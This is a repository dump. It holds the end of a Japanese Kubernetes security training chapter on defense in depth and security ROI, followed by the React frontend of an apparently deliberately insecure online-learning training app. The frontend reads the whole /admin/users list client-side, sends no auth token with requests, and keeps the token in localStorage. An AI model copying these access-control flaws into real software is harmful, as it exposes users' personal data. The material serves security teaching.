164 | - **コンポーネント:** Kubelet、コンテナランタイム(例:containerd)を実行するワーカーノード。 165 | - **制御:** OSの強化、カーネルセキュリティモジュール(例:AppArmor、SELinux)、定期的なパッチ適用、ホストレベルのファイアウォール。 166 | - **検討ポイント:** ワーカーノードのOS強化(最小OSの利用)、セキュリティパッチの適用、ホストレベルのアクセス制限。 167 | - **関連性:** コンテナを実行する基盤となる計算リソースを保護します。 168 | 169 | - **コンテナランタイム層:** 170 | - **コンポーネント:** コンテナイメージ、ランタイム環境。 171 | - **制御:** 脆弱性や誤設定に対するコンテナイメージスキャン、イミュータブルインフラストラクチャの原則、ランタイムセキュリティツール(例:異常な動作を検出するためのFalco)、安全なコンテナ構成(例:特権コンテナなし、読み取り専用ルートファイルシステム)。 172 | - **検討ポイント:** アプリケーションイメージの脆弱性スキャン、Pod Security Standards (PSS) の適用、ランタイム監視。 173 | - **関連性:** アプリケーションの実行環境を保護します。 174 | 175 | - **アプリケーション層:** 176 | - **コンポーネント:** デプロイされたマイクロサービス。 177 | - **制御:** 安全なコーディングプラクティス、入力検証、APIセキュリティ、シークレット管理、アプリケーションレベルの認証/認可、ログと監視。 178 | - **検討ポイント:** アプリケーションにおける入力検証の強化、API認証・認可の改善、アプリケーションログの適切な収集。 179 | - **関連性:** ビジネスロジックが実行される最後の防衛線です。 180 | 181 | - **IDおよびアクセス管理(IAM)層:** 182 | - **コンポーネント:** ユーザー、サービスアカウント、ロール。 183 | - **制御:** Kubernetes RBAC、外部IDプロバイダーとの統合、最小特権原則、多要素認証。 184 | - **検討ポイント:** KubernetesクラスタにおけるRBACの適切な設定、ServiceAccountの権限最小化。 185 | - **関連性:** クラスタ内で誰が何を実行できるかを制御します。 186 | 187 | - **データ層:** 188 | - **コンポーネント:** 保存中および転送中のデータ。 189 | - **制御:** 保存中のデータの暗号化(例:etcd、永続ボリューム)、転送中のデータの暗号化(例:サービスメッシュによるmTLS)、データ損失防止(DLP)。 190 | - **検討ポイント:** データベースのデータ暗号化、Podとデータベース間の通信暗号化。 191 | - **関連性:** 機密情報を保護します。 192 | 193 | ### 3.3. 各層の多様なセキュリティ制御を統合するための戦略 194 | 195 | 効果的な多層防御は、個々の制御を展開するだけでなく、統合とオーケストレーションを必要とします。 196 | 197 | - **セキュリティの自動化とオーケストレーション:** セキュリティ制御のデプロイと構成を自動化するツール(Security as Code)を使用します。CI/CDパイプラインにセキュリティチェックを組み込むことを検討してください。 198 | - **集中型ポリシー管理:** OPA GatekeeperやKyvernoのようなツールは、複数の層にわたってポリシーを一貫して強制できます(例:すべてのPodがネットワークポリシーを持つこと、または特定のセキュリティコンテキストを持つことを保証する)。Kubernetesクラスタにこれらのポリシーコントローラーを導入し、セキュリティポリシーをコードとして管理することを検討してください。 199 | - **継続的な監視と観測性:** すべての層にわたって堅牢なログ、監視、アラートを実装し、脅威を検出して対応します。既存の監視スタックを活用し、セキュリティ関連のログやメトリクスを収集・分析する仕組みを強化することを検討してください。 200 | - **DevSecOps統合:** ソフトウェア開発ライフサイクル全体にわたってセキュリティプラクティスとツールを組み込み、「シフトレフト」を実現し、設計からデプロイまでセキュリティが考慮されるようにします。 201 | 202 | 多層防御を導く原則として「ゼロトラスト」の考え方があります。これは、「決して信頼せず、常に検証する」という原則です。多層防御を提唱するならば、「決して信頼しない」ということは、以前のチェックに関係なく、すべての層が検証し、制御を強制する必要があることを意味します。これは、Kubernetesの各層(ネットワーク、ホスト、アプリケーション、ID)が、他の層が侵害されているか信頼できない可能性があるという前提で動作すべきであることを示唆しています。例えば、ホストが安全であっても、ネットワークポリシーはPod間の通信を制限すべきです。RBACが強力であっても、アプリケーションレベルの認証は依然として必要です。これは、マイクロセグメンテーション、きめ細かいアクセス制御、そしてKubernetesスタック全体にわたる継続的な認証/認可の必要性を推進し、システムを侵害に対して本質的により回復力のあるものにします。 203 | 204 | 一方で、複数のセキュリティ層からデータを収集するだけでなく、それらを相関させることには課題があります。ホストレベルの侵入検知システムからのアラートが、アプリケーションレベルの脆弱性に関連している可能性や、ネットワークポリシー違反がRBACの悪用の前兆である可能性もあります。統一された視点がないと、セキュリティチームはアラート疲労に陥り、重要な攻撃チェーンを見逃すリスクがあります。この状況は、クラウドネイティブ環境に特化した高度なセキュリティ情報イベント管理(SIEM)またはセキュリティオーケストレーション、自動化、応答(SOAR)ソリューションの必要性を示しています。また、効果的な相関とインシデント対応を促進するために、すべてのKubernetesコンポーネントとアプリケーションにわたる標準化されたログ形式とメタデータの重要性も浮き彫りにします。 205 | 206 | ## 4. セキュリティ対策の費用対効果 207 | 208 | セキュリティは技術的な課題だけでなく、ビジネス上の課題でもあります。セキュリティへの投資は、その価値と組織目標との整合性を明確に理解した上で行う必要があります。 209 | 210 | ### 4.1. セキュリティ投資と組織目標およびリスク許容度のバランス 211 | 212 | すべての組織には、その目標を達成するために許容できるリスクのレベルがあります。セキュリティ投資は、このリスク許容度と全体的なビジネス戦略に合致している必要があります。リスクの低い資産に過剰なセキュリティ投資を行うことは、リスクの高い資産への投資不足と同様に有害となる可能性があります。セキュリティとアジリティのバランスを取る必要性は、セキュリティ対策がビジネス運営やイノベーションを不当に妨げてはならないことを示唆しています。サービス停止や開発遅延を避けるというビジネス上の制約がある場合、このバランスを考慮した対策立案が求められます。 213 | 214 | ### 4.2. セキュリティ価値の定量化とリソース配分の最適化 215 | 216 | セキュリティの価値を定量化することは非常に難しいですが、いくつかの方法が役立ちます。 217 | 218 | - **不作為/侵害のコスト:** セキュリティ侵害の潜在的な財務的、評判的、運用上のコストを推定します。これは、組織がそのような事態を防ぐためにどれだけ支出するべきかという基準を提供します。システムが扱う機密情報が漏洩した場合の潜在的な影響を考慮し、対策の必要性を裏付けることができます。 219 | - **リスク削減:** セキュリティ制御による特定の脅威の発生可能性または影響の削減を定量化します。これはリスクベースアプローチに直接結びつきます。 220 | - **コンプライアンスコスト vs. 不遵守ペナルティ:** ルールベースセキュリティの場合、制御の実装コストと不遵守によるペナルティを比較します。ビジネス上の要件を満たせない場合の機会損失も考慮に入れるべきです。 221 | - **効率性の向上:** セキュリティの自動化やシフトレフトの手法は、手作業と手戻りを減らし、運用効率の向上につながる可能性があります。 222 | 223 | ### 4.3. クラウドネイティブにおけるセキュリティ投資収益率(ROSI) 224 | 225 | ROSIは、セキュリティ投資の財務的利益を評価するために使用される指標で、一般的に以下の式で表されます。 226 | 227 | ROSI = ((セキュリティ導入前の年間損失期待値 (ALE) - セキュリティ導入後のALE) - セキュリティ投資コスト) / セキュリティ投資コスト 228 | 229 | - **ALE (年間損失期待値):** 単一損失期待値 (SLE) × 年間発生率 (ARO) で計算されます。 230 | - **SLE:** 単一のセキュリティインシデントから予想される金銭的損失。 231 | - **ARO:** インシデントが1年間に発生する推定頻度。 232 | - **考慮事項:** 233 | - **動的なALE:** クラウドネイティブ環境におけるALEは、リソースの一時的な性質と急速な変化のため、非常に動的である可能性があります。 234 | - **無形資産の利益:** ROSIは、ブランドの評判、顧客の信頼、競争優位性といった無形資産の利益を捉えるのが困難です。ビジネスにおける信頼獲得は、ROSIでは測りにくい重要な要素です。 235 | - **自動化の役割:** 自動化されたセキュリティ制御は、時間の経過とともに「セキュリティ投資コスト」を大幅に削減し、ROSIを向上させることができます。 236 | 237 | セキュリティは単なるコストセンターではなく、アジリティとイノベーションを可能にする要素として捉えるべきです。セキュリティとアジリティのバランスが言及されています。セキュリティが単なるコストまたは障害物と見なされる場合、対策を迂回されたり、優先順位が下げられたりする可能性があります。しかし、セキュリティを開発プロセス(DevSecOps)に組み込み、制御を自動化する(Security as Code)ことで、セキュリティは相乗効果を生み出す力となります。これにより、より迅速で安全なデプロイが可能になり、セキュリティ上の欠陥による技術的負債が減少し、信頼が構築され、市場への対応力が向上します。セキュリティチームは、ROSIに基づく評価だけでなく、市場投入時間の短縮、運用オーバーヘッドの削減などの観点からもその価値を明確にする必要があります。 238 | 239 | --- 240 | 241 | ## 次のステップ 242 | 243 | - [演習3 セキュリティアセスメント](./training.md) 244 | - [4章 セキュリティ対策の導入](../04_hardening/README.md) 245 | -------------------------------------------------------------------------------- /app/frontend/src/App.tsx: -------------------------------------------------------------------------------- 1 | import React, { useState, useEffect } from "react"; 2 | import axios from "axios"; 3 | import { AppBar, Toolbar, Typography, Container, Box, Button, TextField, Card, CardContent, CardActions, Paper, IconButton, Avatar, Divider, Snackbar, Alert, Pagination } from "@mui/material"; 4 | import SchoolIcon from '@mui/icons-material/School'; 5 | import PersonIcon from '@mui/icons-material/Person'; 6 | 7 | // APIのベースURL 8 | const API_URL = process.env.REACT_APP_API_URL ? process.env.REACT_APP_API_URL : "/api"; 9 | console.log("API_URL:", API_URL); 10 | 11 | /** 12 | * プロフィールページコンポーネント 13 | * @param {string} username - 現在のユーザー名 14 | * @param {function} onBack - 戻るボタンがクリックされたときのコールバック 15 | */ 16 | function ProfilePage({ username, onBack }: { username: string; onBack: () => void }) { 17 | const [profile, setProfile] = useState(null); 18 | 19 | useEffect(() => { 20 | const fetchProfile = async () => { 21 | try { 22 | // 全ユーザーリストから現在のユーザーのプロフィールを検索 23 | const res = await axios.get(`${API_URL}/admin/users`); 24 | const user = res.data.find((u: any) => u.username === username); 25 | setProfile(user || null); 26 | } catch (error) { 27 | console.error("プロフィール取得失敗:", error); 28 | } 29 | }; 30 | fetchProfile(); 31 | }, [username]); 32 | 33 | return ( 34 | 35 | 36 | プロフィール 37 | {profile ? ( 38 | 39 | 40 | 41 | {profile.username[0]} 42 | 43 | {profile.username} 44 | 氏名: {profile.full_name} 45 | 46 | 47 | 48 | 49 | ) : ( 50 | 読み込み中... 51 | )} 52 | 53 | ); 54 | } 55 | 56 | /** 57 | * 進捗カード表示コンポーネント 58 | * @param {any} progress - ユーザーごとの進捗または全ユーザーの進捗リスト 59 | * @param {any[]} courses - コース情報のリスト 60 | * @param {any[]} users - ユーザー情報のリスト 61 | */ 62 | function ProgressCards({ progress, courses, users }: { progress: any; courses: any[]; users: any[] }) { 63 | const [currentPage, setCurrentPage] = useState(1); 64 | const itemsPerPage = 15; 65 | 66 | // 進捗データが変更された時にページをリセット 67 | useEffect(() => { 68 | setCurrentPage(1); 69 | }, [progress]); 70 | 71 | // 進捗データがない場合の表示 72 | if (!progress || (Array.isArray(progress) && (progress.length === 0 || progress.every((p: any) => Object.keys(p).length === 0)))) { 73 | return 受講中のコースはありません。; 74 | } 75 | // コース情報がまだロードされていない場合の表示 76 | if (!courses || courses.length === 0) { 77 | return コース情報取得中...; 78 | } 79 | 80 | // 進捗データを常に配列として扱う 81 | const progressList = Array.isArray(progress) ? progress : [progress]; 82 | 83 | // ページネーション計算 84 | const totalPages = Math.ceil(progressList.length / itemsPerPage); 85 | const startIndex = (currentPage - 1) * itemsPerPage; 86 | const endIndex = startIndex + itemsPerPage; 87 | const currentProgress = progressList.slice(startIndex, endIndex); 88 | 89 | const handlePageChange = (event: React.ChangeEvent, value: number) => { 90 | setCurrentPage(value); 91 | }; 92 | 93 | return ( 94 | 95 | 96 | {currentProgress.map((p: any, idx: number) => { 97 | // course_idとidの型を揃えて比較してコース情報を取得 98 | const course = courses.find(c => String(c.id) === String(p.course_id)); 99 | // user_idベースでユーザー検索(idフィールドが存在しない場合の代替手段) 100 | // まずIDフィールドで検索を試行 101 | let user = users?.find(u => 102 | String(u.id || u.user_id || u.ID || u.Id) === String(p.user_id) 103 | ); 104 | 105 | // IDフィールドでの検索に失敗した場合、user_idの位置でユーザーリストから推測 106 | if (!user && users && users.length > 0 && typeof p.user_id === 'number' && p.user_id > 0 && p.user_id <= users.length) { 107 | user = users[p.user_id - 1]; // user_id=1なら配列のindex=0 108 | } 109 | 110 | return ( 111 | 120 | 130 | {/* 上部セクション:ユーザー名とタイトル */} 131 | 132 | 133 | {user ? `受講者: ${user.username}` : `受講者: 不明`} 134 | 135 | 146 | {course ? course.title : `コース名不明 (course_id: ${p.course_id})`} 147 | 148 | 149 | 150 | {/* 下部セクション:プログレスバーと更新情報 */} 151 | 152 | 153 | 154 | 155 | 156 | {typeof p.percent === 'undefined' ? '進捗データ不明' : p.percent === 0 ? '未着手' : p.percent === 100 ? '完了' : `${p.percent}% 完了`} 157 | 158 | 159 | 更新: { 160 | p.updated_at ? p.updated_at.replace('T', ' ').slice(0, 16) : 161 | p.updatedAt ? p.updatedAt.replace('T', ' ').slice(0, 16) : 162 | p.update_time ? p.update_time.replace('T', ' ').slice(0, 16) : 163 | '-' 164 | } 165 | 166 | 167 | 168 | 169 | ); 170 | })} 171 | 172 | {totalPages > 1 && ( 173 | 174 | 181 | 182 | )} 183 | 184 | {progressList.length} 件中 {startIndex + 1}-{Math.min(endIndex, progressList.length)} 件を表示 185 | 186 | 187 | ); 188 | } 189 | 190 | /** 191 | * コースカード表示コンポーネント 192 | * @param {any[]} courses - コース情報のリスト 193 | * @param {function} onJoin - コース参加ボタンがクリックされたときのコールバック 194 | * @param {string} username - 現在のユーザー名 (参加ボタンの有効/無効制御用) 195 | */ 196 | function CourseCards({ courses, onJoin, username }: { courses: any[]; onJoin: (courseId: number) => void; username: string }) { 197 | const [currentPage, setCurrentPage] = useState(1); 198 | const itemsPerPage = 15; 199 | 200 | if (!courses || courses.length === 0) { 201 | return コースデータなし; 202 | } 203 | 204 | // ページネーション計算 205 | const totalPages = Math.ceil(courses.length / itemsPerPage); 206 | const startIndex = (currentPage - 1) * itemsPerPage; 207 | const endIndex = startIndex + itemsPerPage; 208 | const currentCourses = courses.slice(startIndex, endIndex); 209 | 210 | const handlePageChange = (event: React.ChangeEvent, value: number) => { 211 | setCurrentPage(value); 212 | }; 213 | 214 | return ( 215 | 216 | 217 | {currentCourses.map((course: any) => ( 218 | 227 | 237 | {/* 上部セクション:タイトル */} 238 | 239 | 250 | {course.title} 251 | 252 | 253 | 254 | {/* 下部セクション:概要 */} 255 | 256 | 266 | {course.description || ''} 267 | 268 | 269 | 270 | 271 | 272 | 273 | 274 | ))} 275 | 276 | {totalPages > 1 && ( 277 | 278 | 285 | 286 | )} 287 | 288 | {courses.length} 件中 {startIndex + 1}-{Math.min(endIndex, courses.length)} 件を表示 289 | 290 | 291 | ); 292 | } 293 | 294 | /** 295 | * メインアプリケーションコンポーネント 296 | */ 297 | function App() { 298 | const [username, setUsername] = useState(""); 299 | const [password, setPassword] = useState(""); 300 | const [token, setToken] = useState(""); 301 | const [courses, setCourses] = useState([]); 302 | const [progress, setProgress] = useState([]); // 進捗は配列で初期化 303 | const [showProfile, setShowProfile] = useState(false); 304 | const [snackbar, setSnackbar] = useState<{open: boolean, message: string, severity: "success"|"error"|"info"|"warning"}>({open: false, message: "", severity: "info"}); 305 | const [isLoggedIn, setIsLoggedIn] = useState(false); 306 | const [users, setUsers] = useState([]); // 全ユーザー情報 307 | 308 | // 初回マウント時にlocalStorageから認証情報を復元 309 | useEffect(() => { 310 | const savedToken = localStorage.getItem("token"); 311 | const savedUsername = localStorage.getItem("username"); 312 | if (savedToken && savedUsername) { 313 | setToken(savedToken); 314 | setUsername(savedUsername); 315 | setIsLoggedIn(true); 316 | } 317 | }, []); 318 | 319 | /** 320 | * 全ユーザー情報を取得する関数 321 | */ 322 | const fetchAllUsers = async () => { 323 | try { 324 | const usersRes = await axios.get(`${API_URL}/admin/users`); 325 | setUsers(usersRes.data); 326 | } catch (error) { 327 | console.error("ユーザー一覧取得失敗:", error); 328 | setSnackbar({open: true, message: "ユーザー一覧取得失敗", severity: "error"}); 329 | } 330 | }; 331 | 332 | /** 333 | * コース一覧を取得する関数 334 | */ 335 | const fetchCourses = async () => { 336 | try { 337 | const res = await axios.get(`${API_URL}/courses`); 338 | setCourses(res.data); 339 | } catch (error) { 340 | console.error("コース取得失敗:", error); 341 | setSnackbar({open: true, message: "コース取得失敗", severity: "error"}); 342 | } 343 | }; 344 | 345 | /** 346 | * 現在のユーザーの進捗を取得する関数 347 | */ 348 | const fetchProgress = async () => { 349 | // トークンとユーザー名がなければ処理しない 350 | if (!token || !username) return; 351 | try { 352 | const res = await axios.get(`${API_URL}/progress/${username}`); 353 | setProgress(res.data); 354 | // 自分の進捗表示時もユーザー情報を取得しておく 355 | await fetchAllUsers(); 356 | } catch (error) { 357 | console.error("ユーザー進捗取得失敗:", error); 358 | setSnackbar({open: true, message: "進捗取得失敗", severity: "error"}); 359 | } 360 | }; 361 | 362 | /** 363 | * 全ユーザーの進捗を取得する関数 364 | */ 365 | const fetchAllProgress = async () => { 366 | // トークンがなければ処理しない 367 | if (!token) return; 368 | try { 369 | const res = await axios.get(`${API_URL}/progress`); 370 | setProgress(res.data); 371 | // 全ユーザー進捗表示時は、最新のユーザーリストも取得しておく 372 | await fetchAllUsers(); 373 | } catch (error) { 374 | console.error("全ユーザー進捗取得失敗:", error); 375 | setSnackbar({open: true, message: "全ユーザー進捗取得失敗", severity: "error"}); 376 | } 377 | }; 378 | 379 | /** 380 | * ログイン処理 381 | */ 382 | const login = async () => { 383 | try { 384 | const res = await axios.post(`${API_URL}/login`, { username, password }); 385 | setToken(res.data.access_token); 386 | setSnackbar({open: true, message: "ログイン成功", severity: "success"}); 387 | setIsLoggedIn(true); 388 | // localStorageに保存 389 | localStorage.setItem("token", res.data.access_token); 390 | localStorage.setItem("username", username); 391 | // ここではデータフェッチは行わず、useEffectに任せる 392 | } catch (error) { 393 | console.error("ログイン失敗:", error); 394 | setSnackbar({open: true, message: "ログイン失敗", severity: "error"}); 395 | } 396 | }; 397 | 398 | /** 399 | * コース参加処理 400 | * @param {number} courseId - 参加するコースのID 401 | */ 402 | const joinCourse = async (courseId: number) => { 403 | if (!username) { 404 | setSnackbar({open: true, message: "ユーザー名を入力してください", severity: "warning"}); 405 | return; 406 | } 407 | try { 408 | await axios.post(`${API_URL}/courses/${courseId}/join`, { username }); 409 | setSnackbar({open: true, message: "コース参加申請しました", severity: "success"}); 410 | // 参加後、進捗を再フェッチして更新 411 | await fetchProgress(); 412 | } catch (error) { 413 | console.error("参加申請失敗:", error); 414 | setSnackbar({open: true, message: "参加申請失敗", severity: "error"}); 415 | } 416 | }; 417 | 418 | // ログイン成功時に初期データをフェッチするためのuseEffect 419 | useEffect(() => { 420 | if (isLoggedIn && token) { 421 | const loadInitialData = async () => { 422 | // コース、ユーザー、進捗の順にフェッチすることで、依存関係を解決 423 | await fetchCourses(); 424 | await fetchAllUsers(); 425 | await fetchProgress(); // ログインユーザーの進捗を最初に表示 426 | }; 427 | loadInitialData(); 428 | } 429 | }, [isLoggedIn, token, username]); // isLoggedIn, token, usernameが変更されたときに実行 430 | 431 | // プロフィールページ表示中はプロフィールコンポーネントをレンダリング 432 | if (showProfile) { 433 | return setShowProfile(false)} />; 434 | } 435 | 436 | // 未ログイン時の表示 437 | if (!isLoggedIn) { 438 | return ( 439 | 440 | 441 | 442 | 443 | 444 | 無敗塾 オンライン学習サービス 445 | 446 | 447 | 448 | 449 | 450 | ログイン 451 | 452 | setUsername(e.target.value)} size="small" fullWidth sx={{ borderRadius: 1 }} /> 453 | setPassword(e.target.value)} size="small" fullWidth sx={{ borderRadius: 1 }} /> 454 | 455 | 456 | 457 | 458 | setSnackbar({...snackbar, open: false})}> 459 | {snackbar.message} 460 | 461 | 462 | ); 463 | } 464 | 465 | // ログイン後のメインアプリケーション表示 466 | return ( 467 | 468 | 469 | 470 | 471 | 472 | 無敗塾 オンライン学習サービス 473 | 474 | 475 | {isLoggedIn && ( 476 | 493 | )} 494 | 495 | 496 | 497 | 498 | コース一覧 499 | 500 | 501 | 502 | 503 | 進捗管理 504 | 505 | 506 | 507 | 508 | 509 | 510 | 511 | setSnackbar({...snackbar, open: false})}> 512 | {snackbar.message} 513 | 514 | 515 | ); 516 | } 517 | 518 | export default App; --------------------------------------------------------------------------------